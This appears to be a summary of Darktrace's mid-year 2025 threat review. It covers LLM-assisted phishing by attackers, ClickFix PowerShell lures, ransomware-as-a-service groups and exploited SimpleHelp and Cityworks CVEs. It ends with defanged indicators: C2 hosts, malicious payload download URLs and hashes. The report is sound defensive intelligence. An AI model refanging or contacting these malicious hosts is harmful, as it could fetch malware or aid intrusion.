Threat Research

2025 Cyber Threats: A Mid‑Year Review

DarkTrace
2025 Cyber Threats: A Mid‑Year Review

Darktrace observed increased use of AI (notably LLMs) by threat actors to scale and sophisticate phishing and social‑engineering campaigns, alongside continued exploitation of internet‑facing systems and rapid ransomware activity driven by Ransomware‑as‑a‑Service affiliates. Notable threats and IOCs included LameHug, ClickFix campaigns, SimpleHelp CVE exploitation, ransomware families like Qilin/RansomHub/Lynx, and persistent malware such as Raspberry Robin and Auto-Color. #LameHug #ClickFix

Keypoints

  • Threat actors increasingly leverage AI/LLMs to generate large volumes of convincing phishing emails; Darktrace detected over 12.6 million malicious emails from Jan–May 2025.
  • VIPs were heavily targeted, receiving over 25% of phishing emails, and 32% of phishing messages contained high text volume or multistage payloads, consistent with potential LLM use.
  • ClickFix social‑engineering campaigns resurged in Mar–Apr 2025, tricking users into executing PowerShell via fake CAPTCHA plugins on compromised or fraudulent sites.
  • Ransomware operations (RaaS) such as Qilin, RansomHub, and Lynx increased attack speed and complexity; affiliates used varied initial access techniques making pre‑encryption detection difficult.
  • Threat actors continued to exploit known CVEs despite available patches (e.g., SimpleHelp CVE-2024-57727/57728; Trimble Cityworks CVE-2025-0994), often targeting internet‑facing devices and CNI software.
  • SaaS account compromise and phishing kits (FlowerStorm, Mamba2FA) enabled bypasses of MFA and increased SaaS‑targeted ransomware and data exfiltration risk.
  • Persistent malware families and tools—Raspberry Robin, AsyncRAT, Gh0stRAT, Amadey, Stealc, GhostSocks, Auto-Color—remained active, often serving as initial access brokers or follow‑on payloads.

MITRE Techniques

  • [T1566] Phishing – Email-based phishing campaigns generated at scale, including high‑text and multistage payload messages: “The total number of malicious emails detected… was over 12.6 million” (used to deliver credential harvesting and malware).
  • [T1204] User Execution – ClickFix social engineering coerced users to execute PowerShell via fake CAPTCHA plugins: “users believe they are completing human verification… guided through a series of simple steps to execute PowerShell code on their system.”
  • [T1110] Brute Force/Valid Accounts – Credential abuse for initial access to RDP/VPN and SaaS accounts: “threat actors abusing compromised credentials to gain initial entry into networks via… RDP servers and virtual private networks (VPNs)”
  • [T1530] Data from Cloud Storage – SaaS account compromise and file encryption in SaaS platforms leading to data encryption/exfiltration: “The encryption of files within SaaS environments… SaaS accounts are often less protected because of Single Sign‑On (SSO).”
  • [T1210] Exploitation of Remote Services – Exploitation of public-facing services and CVEs including SimpleHelp (CVE-2024-57727/57728) and Trimble Cityworks (CVE-2025-0994): “Medusa ransomware group’s use of the SimpleHelp vulnerabilities… CVE-2025-0994… Darktrace observed signs of exploitation as early as January 19.”
  • [T1071] Application Layer Protocol – Use of web-based C2 and malicious downloads (HTTP/HTTPS) to deliver payloads and C2 communications: examples include “192.210.239[.]172:3219/z44.exe” and multiple HTTP URL C2s.
  • [T1588] Obtain Capabilities – Use of MaaS/RaaS and phishing kits (FlowerStorm, Mamba2FA) to obtain and deploy malware and MFA-bypassing capabilities: “The rise of phishing kits like FlowerStorm and Mamba2FA… enable phishing and abuse users’ trust by mimicking legitimate services to bypass multi‑factor authentication.”
  • [T1078] Valid Accounts – SaaS and service account compromise through credential theft and phishing enabling lateral movement and access: “Credentials remain the weak link… Unauthorized access to SaaS accounts.”

Indicators of Compromise

  • [Hostname] LapDogs ORB C2 and other campaign hosts – www.northumbra[.]com, windows-cam.casacam[.]net
  • [IP Address] C2 and malicious hosts – 192.210.239[.]172 (malicious download), 213.183.63[.]41 (SimpleHelp C2)
  • [URL] Malicious download and payload URLs – 192.210.239[.]172:3219/z44.exe, 192.238.133[.]162:7744/1-111.exe
  • [CVE] Exploited vulnerabilities – CVE-2025-0994 (Trimble Cityworks), CVE-2024-57727 & CVE-2024-57728 (SimpleHelp)
  • [SHA1/MD5 hashes] Malware payload hashes (examples) – 8e9dec3b028f2406a8c546a9e9ea3d50609c36bb (SHA1), f891c920f81bab4efbaaa1f7a850d484 (MD5), and 12 more hashes
  • [Malware/Tool Names] Observed families and kits – Amadey, Stealc, GhostSocks, Raspberry Robin, AsyncRAT (used as follow‑on payloads and IAB activity)

Read more: https://www.darktrace.com/blog/2025-cyber-threat-landscape-darktraces-mid-year-review